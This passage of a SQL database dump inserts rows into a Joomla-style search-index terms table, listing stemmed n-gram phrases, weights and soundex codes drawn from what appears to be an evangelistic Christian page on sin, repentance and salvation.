(321361, 'saved because of', 'save because of', 0, 1, 1.5333, 'S13121', 1, '*'),
(321362, 'saved do', 'save do', 0, 1, 1.2667, 'S130', 1, '*'),
(321363, 'saved do you', 'save do you', 0, 1, 1.4, 'S130', 1, '*'),
(321364, 'saved for', 'save for', 0, 1, 1.3, 'S1316', 1, '*'),
(321365, 'saved for with', 'save for with', 0, 1, 1.4667, 'S13163', 1, '*'),
(321366, 'saved how', 'save how', 0, 1, 1.3, 'S130', 1, '*'),
(321367, 'saved how can', 'save how can', 0, 1, 1.4333, 'S1325', 1, '*'),
(321368, 'saved is', 'save is', 0, 1, 1.2667, 'S132', 1, '*'),
(321369, 'saved is a', 'save is a', 0, 1, 1.3333, 'S132', 1, '*'),
(321370, 'saved me', 'save me', 0, 1, 1.2667, 'S135', 1, '*'),
(321371, 'saved me in', 'save me in', 0, 1, 1.3667, 'S135', 1, '*'),
(321372, 'saved realize', 'save realize', 0, 1, 1.4333, 'S13642', 1, '*'),
(321373, 'saved realize that', 'save realize that', 0, 1, 1.6, 'S136423', 1, '*'),
(321374, 'saved today', 'save today', 0, 1, 1.3667, 'S130', 1, '*'),
(321375, 'saved today i', 'save today i', 0, 1, 1.4333, 'S130', 1, '*'),
(321376, 'saviour believe', 'saviour believe', 0, 1, 1.5, 'S16141', 1, '*'),
(321377, 'saviour believe the', 'saviour believe the', 0, 1, 1.6333, 'S161413', 1, '*'),
(321378, 'saviour forgive', 'saviour forgive', 0, 1, 1.5, 'S161621', 1, '*'),
(321379, 'saviour forgive me', 'saviour forgive me', 0, 1, 1.6, 'S1616215', 1, '*'),
(321380, 'saviour from', 'saviour from', 0, 1, 1.4, 'S16165', 1, '*'),
(321381, 'saviour from sin', 'saviour from sin', 0, 1, 1.5333, 'S1616525', 1, '*'),
(321382, 'saviour no', 'saviour no', 0, 1, 1.3333, 'S165', 1, '*'),
(321383, 'saviour no only', 'saviour no only', 0, 1, 1.5, 'S1654', 1, '*'),
(321384, 'saviour of the', 'saviour of the', 0, 1, 1.4667, 'S1613', 1, '*'),
(321385, 'saviour “repent', 'saviour “repent', 0, 1, 1.5, 'S16153', 1, '*'),
(321386, 'saviour “repent ye', 'saviour “repent ye', 0, 1, 1.6, 'S16153', 1, '*'),
(321387, 'saying and', 'sai and', 0, 1, 1.3333, 'S5253', 1, '*'),
(321388, 'saying and worthy', 'sai and worthy', 0, 1, 1.5667, 'S525363', 1, '*'),
(321389, 'says all', 'sai all', 0, 1, 1.2667, 'S400', 1, '*'),
(321390, 'says all have', 'sai all have', 0, 1, 1.4333, 'S410', 1, '*'),
(321391, 'says “but we', 'sai “but we', 0, 1, 1.4, 'S130', 1, '*'),
(321392, 'self torture', 'self torture', 0, 1, 1.4, 'S413636', 1, '*'),
(321393, 'self torture for', 'self torture for', 0, 1, 1.5333, 'S41363616', 1, '*'),
(321394, 'several good', 'sever good', 0, 1, 1.4, 'S16423', 1, '*'),
(321395, 'several good resolutions', 'sever good resolutions', 0, 1, 1.8, 'S16423624352', 1, '*'),
(321396, 'shalt be', 'shalt be', 0, 1, 1.2667, 'S431', 1, '*'),
(321397, 'shalt be saved', 'shalt be saved', 0, 1, 1.4667, 'S431213', 1, '*'),
(321398, 'shalt believe', 'shalt believe', 0, 1, 1.4333, 'S43141', 1, '*'),
(321399, 'shalt believe in', 'shalt believe in', 0, 1, 1.5333, 'S431415', 1, '*'),
(321400, 'shalt confess', 'shalt confess', 0, 1, 1.4333, 'S432512', 1, '*'),
(321401, 'shalt confess with', 'shalt confess with', 0, 1, 1.6, 'S4325123', 1, '*'),
(321402, 'she goes', 'she goes', 0, 1, 1.2667, 'S000', 1, '*'),
(321403, 'she goes for', 'she goes for', 0, 1, 1.4, 'S160', 1, '*'),
(321404, 'she\'s', 'she', 0, 0, 0.3333, 'S000', 1, '*'),
(321405, 'she\'s pregnant', 'she pregnant', 0, 1, 1.4667, 'S16253', 1, '*'),
(321406, 'she\'s pregnant she', 'she pregnant she', 0, 1, 1.6, 'S162532', 1, '*'),
(321407, 'shed', 'shed', 0, 0, 0.2667, 'S300', 1, '*'),
(321408, 'shed his', 'shed his', 0, 1, 1.2667, 'S320', 1, '*'),
(321409, 'shed his blood', 'shed his blood', 0, 1, 1.4667, 'S32143', 1, '*'),
(321410, 'short of', 'short of', 0, 1, 1.2667, 'S631', 1, '*'),
(321411, 'short of god\'s', 'short of god', 0, 1, 1.4667, 'S631232', 1, '*'),
(321412, 'shows what', 'show what', 0, 1, 1.3333, 'S300', 1, '*'),
(321413, 'shows what does', 'show what does', 0, 1, 1.5, 'S320', 1, '*'),
(321414, 'sin and the', 'sin and the', 0, 1, 1.3667, 'S530', 1, '*'),
(321415, 'sin god', 'sin god', 0, 1, 1.2333, 'S523', 1, '*'),
(321416, 'sin god people', 'sin god people', 0, 1, 1.4667, 'S52314', 1, '*'),
(321417, 'sin “jesus', 'sin “jesus', 0, 1, 1.3333, 'S520', 1, '*'),
(321418, 'sin “jesus said', 'sin “jesus said', 0, 1, 1.5, 'S523', 1, '*'),
(321419, 'sinful', 'sin', 0, 0, 0.4, 'S514', 1, '*'),
(321420, 'sinful habits', 'sin habits', 0, 1, 1.4333, 'S514132', 1, '*'),
(321421, 'sinful habits i', 'sin habits i', 0, 1, 1.5, 'S514132', 1, '*'),
(321422, 'sinful state', 'sin state', 0, 1, 1.4, 'S51423', 1, '*'),
(321423, 'sinful state and', 'sin state and', 0, 1, 1.5333, 'S5142353', 1, '*'),
(321424, 'sinfulness', 'sin', 0, 0, 0.6667, 'S51452', 1, '*'),
(321425, 'sinfulness of', 'sin of', 0, 1, 1.4333, 'S514521', 1, '*'),
(321426, 'sinfulness of your', 'sin of your', 0, 1, 1.6, 'S5145216', 1, '*'),
(321427, 'singular', 'singular', 0, 0, 0.5333, 'S5246', 1, '*'),
(321428, 'singular question', 'singular question', 0, 1, 1.5667, 'S5246235', 1, '*'),
(321429, 'singular question of', 'singular question of', 0, 1, 1.6667, 'S52462351', 1, '*'),
(321430, 'sinned', 'sin', 0, 0, 0.4, 'S530', 1, '*'),
(321431, 'sinned and', 'sin and', 0, 1, 1.3333, 'S5353', 1, '*'),
(321432, 'sinned and come', 'sin and come', 0, 1, 1.5, 'S535325', 1, '*'),
(321433, 'sinned and have', 'sin and have', 0, 1, 1.5, 'S53531', 1, '*'),
(321434, 'sinner and', 'sinner and', 0, 1, 1.3333, 'S5653', 2, '*'),
(321435, 'sinner and cannot', 'sinner and cannot', 0, 1, 1.5667, 'S5653253', 1, '*'),
(321436, 'sinner “for', 'sinner “for', 0, 1, 1.3667, 'S5616', 1, '*'),
(321437, 'sinner “for all', 'sinner “for all', 0, 1, 1.5, 'S56164', 1, '*'),
(321438, 'sinners of', 'sinner of', 0, 1, 1.3333, 'S5621', 1, '*'),
(321439, 'sinners of whom', 'sinner of whom', 0, 1, 1.5, 'S56215', 1, '*'),
(321440, 'sins -', 'sin -', 0, 1, 1.2, 'S520', 1, '*'),
(321441, 'sins - for', 'sin - for', 0, 1, 1.3333, 'S5216', 1, '*'),
(321442, 'sins wash', 'sin wash', 0, 1, 1.3, 'S520', 1, '*'),
(321443, 'sins wash me', 'sin wash me', 0, 1, 1.4, 'S525', 1, '*'),
(321444, 'some people', 'some people', 0, 1, 1.3667, 'S514', 2, '*'),
(321445, 'some people turn', 'some people turn', 0, 1, 1.5333, 'S514365', 1, '*'),
(321446, 'some test', 'some test', 0, 1, 1.3, 'S5323', 1, '*'),
(321447, 'some test questions', 'some test questions', 0, 1, 1.6333, 'S53232352', 1, '*'),
(321448, 'son of god', 'son of god', 0, 1, 1.3333, 'S5123', 1, '*'),
(321449, 'spiritual titles', 'spiritu titles', 0, 1, 1.5333, 'S1634342', 1, '*'),
(321450, 'spiritual titles presently', 'spiritu titles presently', 0, 1, 1.8667, 'S1634342162534', 1, '*'),
(321451, 'spiritual willful', 'spiritu willful', 0, 1, 1.5667, 'S163414', 1, '*'),
(321452, 'spiritual willful decision', 'spiritu willful decision', 0, 1, 1.8667, 'S163414325', 1, '*'),
(321453, 'state and', 'state and', 0, 1, 1.3, 'S353', 1, '*'),
(321454, 'state and turn', 'state and turn', 0, 1, 1.4667, 'S35365', 1, '*'),
(321455, 'student assumes', 'student assumes', 0, 1, 1.5, 'S353252', 1, '*'),
(321456, 'student assumes he\'s', 'student assumes he', 0, 1, 1.6667, 'S353252', 1, '*'),
(321457, 'sure let', 'sure let', 0, 1, 1.2667, 'S643', 1, '*'),
(321458, 'sure let me', 'sure let me', 0, 1, 1.3667, 'S6435', 1, '*'),
(321459, 'sure my', 'sure my', 0, 1, 1.2333, 'S650', 1, '*'),
(321460, 'sure my friend', 'sure my friend', 0, 1, 1.4667, 'S651653', 1, '*'),
(321461, 'test', 'test', 0, 0, 0.2667, 'T230', 1, '*'),
(321462, 'test questions', 'test questions', 0, 1, 1.4667, 'T232352', 1, '*'),
(321463, 'test questions that', 'test questions that', 0, 1, 1.6333, 'T2323523', 1, '*'),
(321464, 'testified in', 'testifi in', 0, 1, 1.4, 'T23135', 1, '*'),
(321465, 'testified in due', 'testifi in due', 0, 1, 1.5333, 'T231353', 1, '*'),
(321466, 'tests and', 'test and', 0, 1, 1.3, 'T23253', 1, '*'),
(321467, 'tests and proves', 'test and proves', 0, 1, 1.5333, 'T232531612', 1, '*'),
(321468, 'thank', 'thank', 1, 0, 0.0417, 'T520', 1, '*'),
(321469, 'thank you', 'thank you', 0, 1, 1.3, 'T520', 1, '*'),
(321470, 'thank you because', 'thank you because', 0, 1, 1.5667, 'T5212', 1, '*'),
(321471, 'that christ jesus', 'that christ jesus', 0, 1, 1.5667, 'T26232', 1, '*'),
(321472, 'that god hath', 'that god hath', 0, 1, 1.4333, 'T230', 1, '*'),
(321473, 'that i might', 'that i might', 0, 1, 1.4, 'T523', 1, '*'),
(321474, 'that i\'m', 'that i', 0, 1, 1.2667, 'T500', 1, '*'),
(321475, 'that i\'m a', 'that i a', 0, 1, 1.3333, 'T500', 1, '*'),
(321476, 'that no other', 'that no other', 0, 1, 1.4333, 'T536', 1, '*'),
(321477, 'that shows', 'that shows', 0, 1, 1.3333, 'T200', 1, '*'),
(321478, 'that shows what', 'that shows what', 0, 1, 1.5, 'T230', 1, '*'),
(321479, 'the aged', 'the aged', 0, 1, 1.2667, 'T230', 1, '*'),
(321480, 'the aged male', 'the aged male', 0, 1, 1.4333, 'T2354', 1, '*'),
(321481, 'the cross died', 'the cross died', 0, 1, 1.4667, 'T2623', 1, '*'),
(321482, 'the dead thou', 'the dead thou', 0, 1, 1.4333, 'T000', 1, '*'),
(321483, 'the gospel good', 'the gospel good', 0, 1, 1.5, 'T21423', 1, '*'),
(321484, 'the gospel the', 'the gospel the', 0, 1, 1.4667, 'T2143', 1, '*'),
(321485, 'the heart man', 'the heart man', 0, 1, 1.4333, 'T635', 1, '*'),
(321486, 'the lord act', 'the lord act', 0, 1, 1.4, 'T46323', 1, '*'),
(321487, 'the lowest form', 'the lowest form', 0, 1, 1.5, 'T423165', 1, '*'),
(321488, 'the man christ', 'the man christ', 0, 1, 1.4667, 'T52623', 1, '*'),
(321489, 'the mouth confession', 'the mouth confession', 0, 1, 1.6667, 'T5325125', 1, '*'),
(321490, 'the person', 'the person', 0, 1, 1.3333, 'T1625', 2, '*'),
(321491, 'the person involved', 'the person involved', 0, 1, 1.6333, 'T16251413', 1, '*'),
(321492, 'the preaching', 'the preaching', 0, 1, 1.4333, 'T16252', 1, '*'),
(321493, 'the preaching of', 'the preaching of', 0, 1, 1.5333, 'T162521', 1, '*'),
(321494, 'the questions', 'the questions', 0, 1, 1.4333, 'T2352', 1, '*'),
(321495, 'the questions that', 'the questions that', 0, 1, 1.6, 'T23523', 1, '*'),
(321496, 'the report', 'the report', 0, 1, 1.3333, 'T6163', 1, '*'),
(321497, 'the report of', 'the report of', 0, 1, 1.4333, 'T61631', 1, '*'),
(321498, 'the saviour', 'the saviour', 0, 1, 1.3667, 'T216', 1, '*'),
(321499, 'the saviour of', 'the saviour of', 0, 1, 1.4667, 'T2161', 1, '*'),
(321500, 'the sinful', 'the sinful', 0, 1, 1.3333, 'T2514', 1, '*'),
(321501, 'the sinful state', 'the sinful state', 0, 1, 1.5333, 'T251423', 1, '*'),
(321502, 'the sinfulness', 'the sinfulness', 0, 1, 1.4667, 'T251452', 1, '*'),
(321503, 'the sinfulness of', 'the sinfulness of', 0, 1, 1.5667, 'T2514521', 1, '*'),
(321504, 'the whole world', 'the whole world', 0, 1, 1.5, 'T4643', 1, '*'),
(321505, 'the world based', 'the world based', 0, 1, 1.5, 'T643123', 1, '*'),
(321506, 'the young', 'the young', 0, 1, 1.3, 'T520', 1, '*'),
(321507, 'the young and', 'the young and', 0, 1, 1.4333, 'T5253', 1, '*'),
(321508, 'their list', 'their list', 0, 1, 1.3333, 'T6423', 1, '*'),
(321509, 'their list you', 'their list you', 0, 1, 1.4667, 'T6423', 1, '*'),
(321510, 'then is', 'then is', 0, 1, 1.2333, 'T520', 1, '*'),
(321511, 'then is saved', 'then is saved', 0, 1, 1.4333, 'T5213', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(321512, 'there is one', 'there is one', 0, 1, 1.4, 'T625', 1, '*'),
(321513, 'these cannot', 'these cannot', 0, 1, 1.4, 'T253', 1, '*'),
(321514, 'these cannot save', 'these cannot save', 0, 1, 1.5667, 'T25321', 1, '*'),
(321515, 'these things you\'ll', 'these things you', 0, 1, 1.6333, 'T23524', 1, '*'),
(321516, 'thine heart that', 'thine heart that', 0, 1, 1.5333, 'T563', 1, '*'),
(321517, 'thing and', 'thing and', 0, 1, 1.3, 'T5253', 1, '*'),
(321518, 'thing and all', 'thing and all', 0, 1, 1.4333, 'T52534', 1, '*'),
(321519, 'things are become', 'thing are become', 0, 1, 1.5667, 'T526125', 1, '*'),
(321520, 'things are passed', 'thing are passed', 0, 1, 1.5667, 'T526123', 1, '*'),
(321521, 'things of life', 'thing of life', 0, 1, 1.4667, 'T52141', 1, '*'),
(321522, 'things you\'ll', 'thing you', 0, 1, 1.4333, 'T524', 1, '*'),
(321523, 'things you\'ll be', 'thing you be', 0, 1, 1.5333, 'T5241', 1, '*'),
(321524, 'this earth', 'thi earth', 0, 1, 1.3333, 'T263', 1, '*'),
(321525, 'this earth and', 'thi earth and', 0, 1, 1.4667, 'T26353', 1, '*'),
(321526, 'this is one', 'thi is one', 0, 1, 1.3667, 'T250', 1, '*'),
(321527, 'this prayer', 'thi prayer', 0, 1, 1.3667, 'T216', 1, '*'),
(321528, 'this prayer father', 'thi prayer father', 0, 1, 1.6, 'T216136', 1, '*'),
(321529, 'this singular', 'thi singular', 0, 1, 1.4333, 'T25246', 1, '*'),
(321530, 'this singular question', 'thi singular question', 0, 1, 1.7333, 'T25246235', 1, '*'),
(321531, 'thou shalt be', 'thou shalt be', 0, 1, 1.4333, 'T2431', 1, '*'),
(321532, 'thou shalt confess', 'thou shalt confess', 0, 1, 1.6, 'T2432512', 1, '*'),
(321533, 'through some', 'through some', 0, 1, 1.4, 'T625', 1, '*'),
(321534, 'through some test', 'through some test', 0, 1, 1.5667, 'T625323', 1, '*'),
(321535, 'through the preaching', 'through the preaching', 0, 1, 1.7, 'T62316252', 1, '*'),
(321536, 'thy mouth the', 'thy mouth the', 0, 1, 1.4333, 'T530', 1, '*'),
(321537, 'tim 1 15', 'tim 1 15', 0, 1, 1.2667, 'T500', 1, '*'),
(321538, 'tim 2', 'tim 2', 0, 1, 1.1667, 'T500', 1, '*'),
(321539, 'tim 2 5-6', 'tim 2 5-6', 0, 1, 1.3, 'T500', 1, '*'),
(321540, 'time 1', 'time 1', 0, 1, 1.2, 'T500', 1, '*'),
(321541, 'time 1 tim', 'time 1 tim', 0, 1, 1.3333, 'T535', 1, '*'),
(321542, 'time this', 'time this', 0, 1, 1.3, 'T532', 1, '*'),
(321543, 'time this is', 'time this is', 0, 1, 1.4, 'T532', 1, '*'),
(321544, 'titles presently', 'titl presently', 0, 1, 1.5333, 'T42162534', 1, '*'),
(321545, 'titles presently and', 'titl presently and', 0, 1, 1.6667, 'T4216253453', 1, '*'),
(321546, 'to accept', 'to accept', 0, 1, 1.3, 'T213', 1, '*'),
(321547, 'to accept christ', 'to accept christ', 0, 1, 1.5333, 'T2132623', 1, '*'),
(321548, 'to all these', 'to all these', 0, 1, 1.4, 'T432', 1, '*'),
(321549, 'to answer on', 'to answer on', 0, 1, 1.4, 'T5265', 1, '*'),
(321550, 'to answer this', 'to answer this', 0, 1, 1.4667, 'T52632', 1, '*'),
(321551, 'to be testified', 'to be testified', 0, 1, 1.5, 'T132313', 1, '*'),
(321552, 'to churches', 'to churches', 0, 1, 1.3667, 'T262', 1, '*'),
(321553, 'to churches men', 'to churches men', 0, 1, 1.5, 'T2625', 1, '*'),
(321554, 'to confirm', 'to confirm', 0, 1, 1.3333, 'T25165', 1, '*'),
(321555, 'to confirm and', 'to confirm and', 0, 1, 1.4667, 'T251653', 1, '*'),
(321556, 'to critical', 'to critical', 0, 1, 1.3667, 'T26324', 1, '*'),
(321557, 'to critical things', 'to critical things', 0, 1, 1.6, 'T26324352', 1, '*'),
(321558, 'to do lord', 'to do lord', 0, 1, 1.3333, 'T463', 1, '*'),
(321559, 'to following jesus', 'to following jesus', 0, 1, 1.6, 'T1452', 1, '*'),
(321560, 'to good', 'to good', 0, 1, 1.2333, 'T230', 1, '*'),
(321561, 'to good deed', 'to good deed', 0, 1, 1.4, 'T230', 1, '*'),
(321562, 'to harm', 'to harm', 0, 1, 1.2333, 'T650', 1, '*'),
(321563, 'to harm another', 'to harm another', 0, 1, 1.5, 'T6536', 1, '*'),
(321564, 'to him do', 'to him do', 0, 1, 1.3, 'T530', 1, '*'),
(321565, 'to make sure', 'to make sure', 0, 1, 1.4, 'T526', 1, '*'),
(321566, 'to save sinners', 'to save sinners', 0, 1, 1.5, 'T212562', 1, '*'),
(321567, 'to sin', 'to sin', 0, 1, 1.2, 'T250', 1, '*'),
(321568, 'to sin god', 'to sin god', 0, 1, 1.3333, 'T2523', 1, '*'),
(321569, 'to turn', 'to turn', 0, 1, 1.2333, 'T650', 1, '*'),
(321570, 'to turn a', 'to turn a', 0, 1, 1.3, 'T650', 1, '*'),
(321571, 'to turn away', 'to turn away', 0, 1, 1.4, 'T650', 1, '*'),
(321572, 'to you in', 'to you in', 0, 1, 1.3, 'T500', 1, '*'),
(321573, 'today i accept', 'todai i accept', 0, 1, 1.4667, 'T213', 1, '*'),
(321574, 'torture', 'tortur', 0, 0, 0.4667, 'T636', 1, '*'),
(321575, 'torture for', 'tortur for', 0, 1, 1.3667, 'T63616', 1, '*'),
(321576, 'torture for a', 'tortur for a', 0, 1, 1.4333, 'T63616', 1, '*'),
(321577, 'turn a', 'turn a', 0, 1, 1.2, 'T650', 1, '*'),
(321578, 'turn a new', 'turn a new', 0, 1, 1.3333, 'T650', 1, '*'),
(321579, 'turn away', 'turn away', 0, 1, 1.3, 'T650', 1, '*'),
(321580, 'turn away from', 'turn away from', 0, 1, 1.4667, 'T65165', 1, '*'),
(321581, 'turn to good', 'turn to good', 0, 1, 1.4, 'T65323', 1, '*'),
(321582, 'turn to jesus', 'turn to jesus', 0, 1, 1.4333, 'T6532', 1, '*'),
(321583, 'two religious', 'two religious', 0, 1, 1.4333, 'T642', 1, '*'),
(321584, 'two religious practices', 'two religious practices', 0, 1, 1.7667, 'T64216232', 1, '*'),
(321585, 'unclean thing', 'unclean thing', 0, 1, 1.4333, 'U5245352', 1, '*'),
(321586, 'unclean thing and', 'unclean thing and', 0, 1, 1.5667, 'U524535253', 1, '*'),
(321587, 'unto righteousness', 'unto righteousness', 0, 1, 1.6, 'U53623252', 1, '*'),
(321588, 'unto righteousness and', 'unto righteousness and', 0, 1, 1.7333, 'U5362325253', 1, '*'),
(321589, 'unto salvation.”', 'unto salvation.”', 0, 1, 1.5333, 'U5324135', 1, '*'),
(321590, 'unto salvation.” have', 'unto salvation.” have', 0, 1, 1.7, 'U53241351', 1, '*'),
(321591, 'want to accept', 'want to accept', 0, 1, 1.4667, 'W53213', 1, '*'),
(321592, 'wash', 'wash', 0, 0, 0.2667, 'W200', 1, '*'),
(321593, 'wash me', 'wash me', 0, 1, 1.2333, 'W250', 1, '*'),
(321594, 'wash me with', 'wash me with', 0, 1, 1.4, 'W253', 1, '*'),
(321595, 'were born', 'were born', 0, 1, 1.3, 'W6165', 2, '*'),
(321596, 'were born and', 'were born and', 0, 1, 1.4333, 'W61653', 1, '*'),
(321597, 'what does', 'what does', 0, 1, 1.3, 'W320', 1, '*'),
(321598, 'what does not', 'what does not', 0, 1, 1.4333, 'W3253', 1, '*'),
(321599, 'what jesus', 'what jesus', 0, 1, 1.3333, 'W320', 1, '*'),
(321600, 'what jesus did', 'what jesus did', 0, 1, 1.4667, 'W323', 1, '*'),
(321601, 'whether one', 'whether one', 0, 1, 1.3667, 'W365', 1, '*'),
(321602, 'whether one is', 'whether one is', 0, 1, 1.4667, 'W3652', 1, '*'),
(321603, 'white and', 'white and', 0, 1, 1.3, 'W353', 1, '*'),
(321604, 'white and black', 'white and black', 0, 1, 1.5, 'W353142', 1, '*'),
(321605, 'who gave', 'who gave', 0, 1, 1.2667, 'W210', 1, '*'),
(321606, 'who gave himself', 'who gave himself', 0, 1, 1.5333, 'W215241', 1, '*'),
(321607, 'who is genuinely', 'who is genuinely', 0, 1, 1.5333, 'W254', 1, '*'),
(321608, 'who then', 'who then', 0, 1, 1.2667, 'W350', 1, '*'),
(321609, 'who then is', 'who then is', 0, 1, 1.3667, 'W352', 1, '*'),
(321610, 'whole i', 'whole i', 0, 1, 1.2333, 'W400', 1, '*'),
(321611, 'whole i forsake', 'whole i forsake', 0, 1, 1.5, 'W4162', 1, '*'),
(321612, 'whole world', 'whole world', 0, 1, 1.3667, 'W4643', 1, '*'),
(321613, 'whole world but', 'whole world but', 0, 1, 1.5, 'W464313', 1, '*'),
(321614, 'whom i', 'whom i', 0, 1, 1.2, 'W500', 1, '*'),
(321615, 'whom i am', 'whom i am', 0, 1, 1.3, 'W500', 1, '*'),
(321616, 'will and word', 'will and word', 0, 1, 1.4333, 'W45363', 1, '*'),
(321617, 'will you have', 'will you have', 0, 1, 1.4333, 'W410', 1, '*'),
(321618, 'willful', 'will', 0, 0, 0.4667, 'W414', 1, '*'),
(321619, 'willful decision', 'will decision', 0, 1, 1.5333, 'W414325', 1, '*'),
(321620, 'willful decision to', 'will decision to', 0, 1, 1.6333, 'W4143253', 1, '*'),
(321621, 'with him do', 'with him do', 0, 1, 1.3667, 'W353', 1, '*'),
(321622, 'with my heart', 'with my heart', 0, 1, 1.4333, 'W3563', 1, '*'),
(321623, 'with my mouth', 'with my mouth', 0, 1, 1.4333, 'W353', 1, '*'),
(321624, 'with no personal', 'with no personal', 0, 1, 1.5333, 'W3516254', 1, '*'),
(321625, 'with the heart', 'with the heart', 0, 1, 1.4667, 'W363', 1, '*'),
(321626, 'with the mouth', 'with the mouth', 0, 1, 1.4667, 'W353', 1, '*'),
(321627, 'with thy', 'with thy', 0, 1, 1.2667, 'W300', 1, '*'),
(321628, 'with thy mouth', 'with thy mouth', 0, 1, 1.4667, 'W353', 1, '*'),
(321629, 'with your blood', 'with your blood', 0, 1, 1.5, 'W36143', 1, '*'),
(321630, 'woman assumes', 'woman assumes', 0, 1, 1.4333, 'W5252', 1, '*'),
(321631, 'woman assumes she\'s', 'woman assumes she', 0, 1, 1.6333, 'W5252', 1, '*'),
(321632, 'word in all', 'word in all', 0, 1, 1.3667, 'W6354', 1, '*'),
(321633, 'work on assumption', 'work on assumption', 0, 1, 1.6, 'W62525135', 1, '*'),
(321634, 'works have', 'work have', 0, 1, 1.3333, 'W621', 1, '*'),
(321635, 'works have you', 'work have you', 0, 1, 1.4667, 'W621', 1, '*'),
(321636, 'world and all', 'world and all', 0, 1, 1.4333, 'W643534', 1, '*'),
(321637, 'world based', 'world based', 0, 1, 1.3667, 'W643123', 1, '*'),
(321638, 'world based on', 'world based on', 0, 1, 1.4667, 'W6431235', 1, '*'),
(321639, 'world but with', 'world but with', 0, 1, 1.4667, 'W64313', 1, '*'),
(321640, 'world to save', 'world to save', 0, 1, 1.4333, 'W64321', 1, '*'),
(321641, 'worthy', 'worthi', 0, 0, 0.4, 'W630', 1, '*'),
(321642, 'worthy of', 'worthi of', 0, 1, 1.3, 'W631', 1, '*'),
(321643, 'worthy of all', 'worthi of all', 0, 1, 1.4333, 'W6314', 1, '*'),
(321644, 'you are good', 'you are good', 0, 1, 1.4, 'Y623', 1, '*'),
(321645, 'you be saved', 'you be saved', 0, 1, 1.4, 'Y1213', 1, '*'),
(321646, 'you because you', 'you because you', 0, 1, 1.5, 'Y120', 1, '*'),
(321647, 'you believe', 'you believe', 0, 1, 1.3667, 'Y141', 1, '*'),
(321648, 'you believe in', 'you believe in', 0, 1, 1.4667, 'Y1415', 1, '*'),
(321649, 'you believe you', 'you believe you', 0, 1, 1.5, 'Y141', 1, '*'),
(321650, 'you cannot assume', 'you cannot assume', 0, 1, 1.5667, 'Y25325', 1, '*'),
(321651, 'you do you', 'you do you', 0, 1, 1.3333, 'Y300', 1, '*'),
(321652, 'you doing your', 'you doing your', 0, 1, 1.4667, 'Y3526', 1, '*'),
(321653, 'you don\'t work', 'you don work', 0, 1, 1.4667, 'Y35362', 1, '*'),
(321654, 'you even', 'you even', 0, 1, 1.2667, 'Y150', 1, '*'),
(321655, 'you even believe', 'you even believe', 0, 1, 1.5333, 'Y15141', 1, '*'),
(321656, 'you full', 'you full', 0, 1, 1.2667, 'Y140', 1, '*'),
(321657, 'you full of', 'you full of', 0, 1, 1.3667, 'Y141', 1, '*'),
(321658, 'you give money', 'you give money', 0, 1, 1.4667, 'Y215', 1, '*'),
(321659, 'you have me', 'you have me', 0, 1, 1.3667, 'Y150', 1, '*'),
(321660, 'you have saved', 'you have saved', 0, 1, 1.4667, 'Y1213', 1, '*'),
(321661, 'you holding', 'you holding', 0, 1, 1.3667, 'Y4352', 1, '*'),
(321662, 'you holding spiritual', 'you holding spiritual', 0, 1, 1.7, 'Y43521634', 1, '*'),
(321663, 'you isaiah', 'you isaiah', 0, 1, 1.3333, 'Y200', 1, '*'),
(321664, 'you isaiah 64', 'you isaiah 64', 0, 1, 1.4333, 'Y200', 1, '*'),
(321665, 'you just joined', 'you just joined', 0, 1, 1.5, 'Y23253', 1, '*'),
(321666, 'you just made', 'you just made', 0, 1, 1.4333, 'Y2353', 1, '*'),
(321667, 'you through some', 'you through some', 0, 1, 1.5333, 'Y3625', 1, '*'),
(321668, 'you were', 'you were', 0, 1, 1.2667, 'Y600', 2, '*'),
(321669, 'you were born', 'you were born', 0, 1, 1.4333, 'Y6165', 2, '*'),
(321670, 'you\'ll be saved', 'you be saved', 0, 1, 1.5, 'Y41213', 1, '*'),
(321671, 'you\'re saved', 'you saved', 0, 1, 1.4, 'Y6213', 1, '*'),
(321672, 'you\'re saved because', 'you saved because', 0, 1, 1.6667, 'Y621312', 1, '*'),
(321673, 'young and the', 'young and the', 0, 1, 1.4333, 'Y5253', 1, '*'),
(321674, 'your best not', 'your best not', 0, 1, 1.4333, 'Y612353', 1, '*'),
(321675, 'your blood', 'your blood', 0, 1, 1.3333, 'Y6143', 1, '*'),
(321676, 'your blood and', 'your blood and', 0, 1, 1.4667, 'Y614353', 1, '*'),
(321677, 'your heart now', 'your heart now', 0, 1, 1.4667, 'Y635', 1, '*'),
(321678, 'your need', 'your need', 0, 1, 1.3, 'Y653', 1, '*'),
(321679, 'your need of', 'your need of', 0, 1, 1.4, 'Y6531', 1, '*'),
(321680, 'your past', 'your past', 0, 1, 1.3, 'Y6123', 1, '*'),
(321681, 'your past beloved', 'your past beloved', 0, 1, 1.5667, 'Y61231413', 1, '*'),
(321682, 'your personal lord', 'your personal lord', 0, 1, 1.6, 'Y61625463', 1, '*'),
(321683, 'your personal saviour', 'your personal saviour', 0, 1, 1.7, 'Y616254216', 1, '*'),
(321684, 'your personalsin', 'your personalsin', 0, 1, 1.5333, 'Y61625425', 1, '*'),
(321685, 'your personalsin realize', 'your personalsin realize', 0, 1, 1.8, 'Y61625425642', 1, '*'),
(321686, 'your repentance', 'your repentance', 0, 1, 1.5, 'Y615352', 1, '*'),
(321687, 'your repentance and', 'your repentance and', 0, 1, 1.6333, 'Y61535253', 1, '*'),
(321688, 'your sins -', 'your sins -', 0, 1, 1.3667, 'Y6252', 1, '*'),
(321689, '“but we', '“but we', 0, 1, 1.2333, '“130', 1, '*'),
(321690, '“but we are', '“but we are', 0, 1, 1.3667, '“136', 1, '*'),
(321691, '“for all', '“for all', 0, 1, 1.2667, '“164', 1, '*'),
(321692, '“for all have', '“for all have', 0, 1, 1.4333, '“1641', 1, '*'),
(321693, '“jesus', '“jesu', 0, 0, 0.4, '“200', 1, '*'),
(321694, '“jesus said', '“jesu said', 0, 1, 1.3667, '“230', 1, '*'),
(321695, '“jesus said to', '“jesu said to', 0, 1, 1.4667, '“230', 1, '*'),
(321696, '“repent', '“repent', 0, 0, 0.4667, '“6153', 1, '*'),
(321697, '“repent ye', '“repent ye', 0, 1, 1.3333, '“6153', 1, '*'),
(321698, '“repent ye therefore', '“repent ye therefore', 0, 1, 1.6667, '“6153616', 1, '*'),
(321699, '“short', '“short', 0, 0, 0.4, '“263', 1, '*'),
(321700, '“short of', '“short of', 0, 1, 1.3, '“2631', 1, '*'),
(321701, '“short of the', '“short of the', 0, 1, 1.4333, '“26313', 1, '*'),
(321702, '“that if', '“that if', 0, 1, 1.2667, '“310', 1, '*'),
(321703, '“that if thou', '“that if thou', 0, 1, 1.4333, '“313', 1, '*'),
